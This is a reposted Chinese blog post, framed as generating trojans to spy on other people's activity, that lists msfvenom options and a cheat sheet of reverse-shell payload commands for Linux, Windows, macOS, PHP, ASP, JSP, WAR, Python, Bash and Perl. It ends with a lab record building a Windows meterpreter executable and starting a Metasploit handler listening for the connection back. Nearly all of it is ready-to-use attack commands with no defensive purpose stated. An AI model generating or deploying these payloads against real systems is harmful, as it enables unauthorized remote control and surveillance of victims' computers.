使用msfvenom生成木马用于监听别人的操作

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

                       

msfvenom

Options:

-p, –payload    < payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定

-l, –list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, –nopsled    < length>        为payload预先指定一个NOP滑动长度

-f, –format     < format>        指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)

-e, –encoder    [encoder]       指定需要使用的encoder(编码器)

-a, –arch       < architecture>  指定payload的目标架构

–platform   < platform>          指定payload的目标平台

-s, –space      < length>        设定有效攻击荷载的最大长度

-b, –bad-chars  < list>          设定规避字符集,比如: & #039;\x00\xff& #039;

-i, –iterations < count>         指定payload的编码次数

-c, –add-code   < path>          指定一个附加的win32 shellcode文件

-x, –template   < path>          指定一个自定义的可执行文件作为模板

-k, –keep                       保护模板程序的动作,注入的payload作为一个新的进程运行

–payload-options                列举payload的标准选项

-o, –out   < path>               保存payload

-v, –var-name < name>            指定一个自定义的变量,以确定输出格式

–shellest                       最小化生成payload

-h, –help                       查看帮助选项

–help-formats                   查看msf支持的输出格式列表

不同系统下生成木马的命令(在对方的操作系统中生成木马)

Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMacmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.warScripting PayloadsPythonmsfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
   
   
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40

实验记录:

本机ip:192.168.0.109

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 -f exe > shell.exe
//host是攻击者也就是我的ip地址

msfconle     打开metasploit软件

msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set lhost 192.168.0.109

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

           

给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow

这里写图片描述

猜你喜欢

转载自blog.csdn.net/qq_43679940/article/details/84033715